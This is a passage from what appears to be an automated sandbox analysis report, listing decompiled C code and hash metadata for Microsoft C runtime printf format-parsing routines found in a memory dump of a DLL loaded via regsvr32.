                                    				_a1096 = _a1096 + 1;
                                    				asm("bts eax, 0xc");
                                    				goto 0xf9d3beb2;
                                    				_a80 = _a80 | 0x00000010;
                                    				goto 0xf9d3bfd9;
                                    				asm("bts eax, 0xf");
                                    				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                    				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                    				_a1096 = _a1096 + 2;
                                    				asm("bts eax, 0xf");
                                    				goto 0xf9d3bfbe;
                                    				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                    				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                    				_a1096 = _a1096 + 2;
                                    				asm("btr eax, 0xf");
                                    				goto 0xf9d3bfbe;
                                    				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                    				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                    				goto 0xf9d3bfbe;
                                    				_a704 = 0;
                                    				goto E000007FE7FEF9D3BB66;
                                    				goto 0xf9d3bfd9;
                                    				_a80 = _a80 | 0x00000020;
                                    				goto 0xf9d3bfd9;
                                    				asm("bts eax, 0xb");
                                    				_a976 = _a696;
                                    				_a976 = _a976 - 0x41;
                                    				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                    				goto __rax;
                                    			}




                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                    • API String ID: 530996419-3826063230
                                    • Opcode ID: ca0a1c3a4d76a0406b352d4f9ca239403a79a6076d76e868b137271f3bc4e837
                                    • Instruction ID: 94b803b8bf2c9d0da31cb8fabbb810b13218eabd765851e9cd54d2cd97e7a3d8
                                    • Opcode Fuzzy Hash: ca0a1c3a4d76a0406b352d4f9ca239403a79a6076d76e868b137271f3bc4e837
                                    • Instruction Fuzzy Hash: 46915E72A0D6C28AE3F18B54E88477EB7E4E381346F601026D7CD87AA9CB7ED5418F11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E000007FE7FEF9D3DDE0(signed int _a80, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544) {
                                    
                                    				_a1408 = _a1208 & 0x0000ffff;
                                    				if (_a1408 == 0x49) goto 0xf9d3de66;
                                    				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                    				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                    				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                    				goto 0xf9d3df88;
                                    				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                    				_a1544 =  &(_a1544[1]);
                                    				asm("bts eax, 0xc");
                                    				goto 0xf9d3de61;
                                    				_a80 = _a80 | 0x00000010;
                                    				goto 0xf9d3df88;
                                    				asm("bts eax, 0xf");
                                    				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                    				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                    				_a1544 =  &(_a1544[2]);
                                    				asm("bts eax, 0xf");
                                    				goto 0xf9d3df6d;
                                    				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                    				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                    				_a1544 =  &(_a1544[2]);
                                    				asm("btr eax, 0xf");
                                    				goto 0xf9d3df6d;
                                    				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                    				goto 0xf9d3df6d;
                                    				_a1216 = 0;
                                    				goto E000007FE7FEF9D3DC41;
                                    				goto 0xf9d3df88;
                                    				_a80 = _a80 | 0x00000020;
                                    				goto 0xf9d3df88;
                                    				asm("bts eax, 0xb");
                                    				_a1412 = _a1208 & 0x0000ffff;
                                    				_a1412 = _a1412 - 0x41;
                                    				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                    				goto __rax;
                                    			}




                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                    • API String ID: 530996419-4206863317
                                    • Opcode ID: 7c5d23002966610aaf37fd2e87aab718b594dfcb558d5e32631a425086473698
                                    • Instruction ID: 3115a511369859e1f947b9f2c3204b19b7531d4cbd05c4b67493ff7b1ab56a73
                                    • Opcode Fuzzy Hash: 7c5d23002966610aaf37fd2e87aab718b594dfcb558d5e32631a425086473698
                                    • Instruction Fuzzy Hash: 5C910C62A0C6C18AE7F08B55E88077EB3E1F385756F600025E6CD87AA8DB7ED855DF10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 27%
                                    			E000007FE7FEF9D3BCFA(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                    				void* _t171;
                                    				char* _t191;
                                    				char* _t192;
                                    
                                    				_a968 = _a696 & 0x000000ff;
                                    				if (_a968 == 0x20) goto 0xf9d3bd57;
                                    				if (_a968 == 0x23) goto 0xf9d3bd64;
                                    				if (_a968 == 0x2b) goto 0xf9d3bd4a;
                                    				if (_a968 == 0x2d) goto 0xf9d3bd3d;
                                    				if (_a968 == 0x30) goto 0xf9d3bd72;
                                    				goto 0xf9d3bd7d;
                                    				_a80 = _a80 | 0x00000004;
                                    				goto 0xf9d3bd7d;
                                    				_a80 = _a80 | 0x00000001;
                                    				goto 0xf9d3bd7d;
                                    				_a80 = _a80 | 0x00000002;
                                    				goto 0xf9d3bd7d;
                                    				asm("bts eax, 0x7");
                                    				goto 0xf9d3bd7d;
                                    				_a80 = _a80 | 0x00000008;
                                    				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                    				_t191 =  &_a1112;
                                    				_a88 = E000007FE7FEF9D31E40(_t191);
                                    				if (_a88 >= 0) goto 0xf9d3bdbc;
                                    				_a80 = _a80 | 0x00000004;
                                    				_a88 =  ~_a88;
                                    				goto 0xf9d3bdd5;
                                    				_a88 = _t171 + _t191 - 0x30;
                                    				_a116 = 0;
                                    				if (_a696 != 0x2a) goto 0xf9d3be16;
                                    				_t192 =  &_a1112;
                                    				_a116 = E000007FE7FEF9D31E40(_t192);
                                    				if (_a116 >= 0) goto 0xf9d3be14;
                                    				_a116 = 0xffffffff;
                                    				goto 0xf9d3be2d;
                                    				_a116 = _t171 + _t192 - 0x30;
                                    				_a972 = _a696 & 0x000000ff;
                                    				if (_a972 == 0x49) goto 0xf9d3beb7;
                                    				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                    				if (_a972 == 0x6c) goto 0xf9d3be76;
                                    				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                    				goto 0xf9d3bfd9;
                                    				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                    				_a1096 = _a1096 + 1;
                                    				asm("bts eax, 0xc");
                                    				goto 0xf9d3beb2;
                                    				_a80 = _a80 | 0x00000010;
                                    				goto 0xf9d3bfd9;
                                    				asm("bts eax, 0xf");
                                    				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                    				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                    				_a1096 = _a1096 + 2;
                                    				asm("bts eax, 0xf");
                                    				goto 0xf9d3bfbe;
                                    				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                    				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                    				_a1096 = _a1096 + 2;
                                    				asm("btr eax, 0xf");
                                    				goto 0xf9d3bfbe;
                                    				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                    				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                    				goto 0xf9d3bfbe;
                                    				_a704 = 0;
                                    				goto E000007FE7FEF9D3BB66;
                                    				goto 0xf9d3bfd9;
                                    				_a80 = _a80 | 0x00000020;
                                    				goto 0xf9d3bfd9;
                                    				asm("bts eax, 0xb");
                                    				_a976 = _a696;
                                    				_a976 = _a976 - 0x41;
                                    				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                    				goto __rax;
                                    			}







                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$0$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 530996419-4087627031
                                    • Opcode ID: 1de43203eafd45e9ce0d0d64285ee361cc766a04d488c37d7d0694f7340f7322
                                    • Instruction ID: 3ab598f7b4fd695a8a70feaac4248e5f119f303646eea4bd5d4eba80b196619f
                                    • Opcode Fuzzy Hash: 1de43203eafd45e9ce0d0d64285ee361cc766a04d488c37d7d0694f7340f7322
                                    • Instruction Fuzzy Hash: F3514C72A0D6C28AF3F19B64E855BBEBBE4F381345F200126D2D9869A9D77DE540CF10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 27%
                                    			E000007FE7FEF9D3DCA8(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                    				void* _t171;
                                    				char* _t191;
                                    				char* _t192;
                                    
                                    				_a1404 = _a1208 & 0x0000ffff;
                                    				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                    				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                    				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                    				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                    				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                    				goto 0xf9d3dd2b;
                                    				_a80 = _a80 | 0x00000004;
                                    				goto 0xf9d3dd2b;
                                    				_a80 = _a80 | 0x00000001;
                                    				goto 0xf9d3dd2b;
                                    				_a80 = _a80 | 0x00000002;
                                    				goto 0xf9d3dd2b;
                                    				asm("bts eax, 0x7");
                                    				goto 0xf9d3dd2b;
                                    				_a80 = _a80 | 0x00000008;
                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                    				_t191 =  &_a1560;
                                    				_a88 = E000007FE7FEF9D31E40(_t191);
                                    				if (_a88 >= 0) goto 0xf9d3dd6a;
                                    				_a80 = _a80 | 0x00000004;
                                    				_a88 =  ~_a88;
                                    				goto 0xf9d3dd83;
                                    				_a88 = _t171 + _t191 - 0x30;
                                    				_a116 = 0;
                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                    				_t192 =  &_a1560;
                                    				_a116 = E000007FE7FEF9D31E40(_t192);
                                    				if (_a116 >= 0) goto 0xf9d3ddc2;
                                    				_a116 = 0xffffffff;
                                    				goto 0xf9d3dddb;
                                    				_a116 = _t171 + _t192 - 0x30;
                                    				_a1408 = _a1208 & 0x0000ffff;
                                    				if (_a1408 == 0x49) goto 0xf9d3de66;
                                    				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                    				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                    				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                    				goto 0xf9d3df88;
                                    				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                    				_a1544 =  &(_a1544[1]);
                                    				asm("bts eax, 0xc");
                                    				goto 0xf9d3de61;
                                    				_a80 = _a80 | 0x00000010;
                                    				goto 0xf9d3df88;
                                    				asm("bts eax, 0xf");
                                    				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                    				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                    				_a1544 =  &(_a1544[2]);
                                    				asm("bts eax, 0xf");
                                    				goto 0xf9d3df6d;
                                    				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                    				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                    				_a1544 =  &(_a1544[2]);
                                    				asm("btr eax, 0xf");
                                    				goto 0xf9d3df6d;
                                    				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                    				goto 0xf9d3df6d;
                                    				_a1216 = 0;
                                    				goto E000007FE7FEF9D3DC41;
                                    				goto 0xf9d3df88;
                                    				_a80 = _a80 | 0x00000020;
                                    				goto 0xf9d3df88;
                                    				asm("bts eax, 0xb");
                                    				_a1412 = _a1208 & 0x0000ffff;
                                    				_a1412 = _a1412 - 0x41;
                                    				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                    				goto __rax;
                                    			}







                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$0$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 530996419-1247675978
                                    • Opcode ID: f21bac4cf66fd83060826b10cda673f64da0b58cdc9b26c9e440e84a16dbb144
                                    • Instruction ID: f27db2fcef6f8d513c01393a57896d629d62aa2ad95cdf3e250bd1829576e434
                                    • Opcode Fuzzy Hash: f21bac4cf66fd83060826b10cda673f64da0b58cdc9b26c9e440e84a16dbb144
                                    • Instruction Fuzzy Hash: FA510CB2A0C6C28AE7B09B64E8407BEB7E0F385346F600125D6CA869A8D77DE444DF10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 26%
                                    			E000007FE7FEF9D3BD82(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                    				void* _t139;
                                    				char* _t159;
                                    				char* _t160;
                                    
                                    				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                    				_t159 =  &_a1112;
                                    				_a88 = E000007FE7FEF9D31E40(_t159);
                                    				if (_a88 >= 0) goto 0xf9d3bdbc;
                                    				_a80 = _a80 | 0x00000004;
                                    				_a88 =  ~_a88;
                                    				goto 0xf9d3bdd5;
                                    				_a88 = _t139 + _t159 - 0x30;
                                    				_a116 = 0;
                                    				if (_a696 != 0x2a) goto 0xf9d3be16;
                                    				_t160 =  &_a1112;
                                    				_a116 = E000007FE7FEF9D31E40(_t160);
                                    				if (_a116 >= 0) goto 0xf9d3be14;
                                    				_a116 = 0xffffffff;
                                    				goto 0xf9d3be2d;
                                    				_a116 = _t139 + _t160 - 0x30;
                                    				_a972 = _a696 & 0x000000ff;
                                    				if (_a972 == 0x49) goto 0xf9d3beb7;
                                    				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                    				if (_a972 == 0x6c) goto 0xf9d3be76;
                                    				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                    				goto 0xf9d3bfd9;
                                    				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                    				_a1096 = _a1096 + 1;
                                    				asm("bts eax, 0xc");
                                    				goto 0xf9d3beb2;
                                    				_a80 = _a80 | 0x00000010;
                                    				goto 0xf9d3bfd9;
                                    				asm("bts eax, 0xf");
                                    				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                    				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                    				_a1096 = _a1096 + 2;
                                    				asm("bts eax, 0xf");
                                    				goto 0xf9d3bfbe;
                                    				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                    				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                    				_a1096 = _a1096 + 2;
                                    				asm("btr eax, 0xf");
                                    				goto 0xf9d3bfbe;
                                    				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                    				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                    				goto 0xf9d3bfbe;
                                    				_a704 = 0;
                                    				goto E000007FE7FEF9D3BB66;
                                    				goto 0xf9d3bfd9;
                                    				_a80 = _a80 | 0x00000020;
                                    				goto 0xf9d3bfd9;
                                    				asm("bts eax, 0xb");
                                    				_a976 = _a696;
                                    				_a976 = _a976 - 0x41;
                                    				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                    				goto __rax;
                                    			}







                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                    • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2576288505-192189897
                                    • Opcode ID: 642eb86adef82c061240f963ecada7643a5a14508ef6930c6b5b5b901d4a1b0a
                                    • Instruction ID: e5e15c00c08c12f84a3dc3260eb1d354ac6b745d6778a8e2653f024642a32d0f
                                    • Opcode Fuzzy Hash: 642eb86adef82c061240f963ecada7643a5a14508ef6930c6b5b5b901d4a1b0a
                                    • Instruction Fuzzy Hash: 0D515E72A0D6C28AE7F0DB24E8947BEBBE4E384355F600126D2CD869A9DB7DD541CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 26%
                                    			E000007FE7FEF9D3DD30(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                    				void* _t139;
                                    				char* _t159;
                                    				char* _t160;
                                    
                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                    				_t159 =  &_a1560;
                                    				_a88 = E000007FE7FEF9D31E40(_t159);
                                    				if (_a88 >= 0) goto 0xf9d3dd6a;
                                    				_a80 = _a80 | 0x00000004;
                                    				_a88 =  ~_a88;
                                    				goto 0xf9d3dd83;
                                    				_a88 = _t139 + _t159 - 0x30;
                                    				_a116 = 0;
                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                    				_t160 =  &_a1560;
                                    				_a116 = E000007FE7FEF9D31E40(_t160);
                                    				if (_a116 >= 0) goto 0xf9d3ddc2;
                                    				_a116 = 0xffffffff;
                                    				goto 0xf9d3dddb;
                                    				_a116 = _t139 + _t160 - 0x30;
                                    				_a1408 = _a1208 & 0x0000ffff;
                                    				if (_a1408 == 0x49) goto 0xf9d3de66;
                                    				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                    				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                    				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                    				goto 0xf9d3df88;
                                    				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                    				_a1544 =  &(_a1544[1]);
                                    				asm("bts eax, 0xc");
                                    				goto 0xf9d3de61;
                                    				_a80 = _a80 | 0x00000010;
                                    				goto 0xf9d3df88;
                                    				asm("bts eax, 0xf");
                                    				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                    				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                    				_a1544 =  &(_a1544[2]);
                                    				asm("bts eax, 0xf");
                                    				goto 0xf9d3df6d;
                                    				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                    				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                    				_a1544 =  &(_a1544[2]);
                                    				asm("btr eax, 0xf");
                                    				goto 0xf9d3df6d;
                                    				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                    				goto 0xf9d3df6d;
                                    				_a1216 = 0;
                                    				goto E000007FE7FEF9D3DC41;
                                    				goto 0xf9d3df88;
                                    				_a80 = _a80 | 0x00000020;
                                    				goto 0xf9d3df88;
                                    				asm("bts eax, 0xb");
                                    				_a1412 = _a1208 & 0x0000ffff;
                                    				_a1412 = _a1412 - 0x41;
                                    				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                    				goto __rax;
                                    			}







                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2576288505-734865713
                                    • Opcode ID: 84afe223306fb715127401468d722999f495e1b64e531eed53167a130bda57e2
                                    • Instruction ID: 8bcff37972761654e6234074656759b20f0543a56075d35ebc75ec1029b84271
                                    • Opcode Fuzzy Hash: 84afe223306fb715127401468d722999f495e1b64e531eed53167a130bda57e2
                                    • Instruction Fuzzy Hash: 0451FCB2A0C6C28AE7B09B64E8407BEB7E4F394346F600125E6C9879A9D77DD445CF14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 24%
                                    			E000007FE7FEF9D3BDE7(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                    				void* _t113;
                                    				char* _t133;
                                    
                                    				if (_a696 != 0x2a) goto 0xf9d3be16;
                                    				_t133 =  &_a1112;
                                    				_a116 = E000007FE7FEF9D31E40(_t133);
                                    				if (_a116 >= 0) goto 0xf9d3be14;
                                    				_a116 = 0xffffffff;
                                    				goto 0xf9d3be2d;
                                    				_a116 = _t113 + _t133 - 0x30;
                                    				_a972 = _a696 & 0x000000ff;
                                    				if (_a972 == 0x49) goto 0xf9d3beb7;
                                    				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                    				if (_a972 == 0x6c) goto 0xf9d3be76;
                                    				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                    				goto 0xf9d3bfd9;
                                    				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                    				_a1096 = _a1096 + 1;
                                    				asm("bts eax, 0xc");
                                    				goto 0xf9d3beb2;
                                    				_a80 = _a80 | 0x00000010;
                                    				goto 0xf9d3bfd9;
                                    				asm("bts eax, 0xf");
                                    				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                    				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                    				_a1096 = _a1096 + 2;
                                    				asm("bts eax, 0xf");
                                    				goto 0xf9d3bfbe;
                                    				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                    				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                    				_a1096 = _a1096 + 2;
                                    				asm("btr eax, 0xf");
                                    				goto 0xf9d3bfbe;
                                    				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                    				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                    				goto 0xf9d3bfbe;
                                    				_a704 = 0;
                                    				goto E000007FE7FEF9D3BB66;
                                    				goto 0xf9d3bfd9;
                                    				_a80 = _a80 | 0x00000020;
                                    				goto 0xf9d3bfd9;
                                    				asm("bts eax, 0xb");
                                    				_a976 = _a696;
                                    				_a976 = _a976 - 0x41;
                                    				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                    				goto __rax;
                                    			}






                                    APIs
                                    Strings
                                    Memory Dump Source
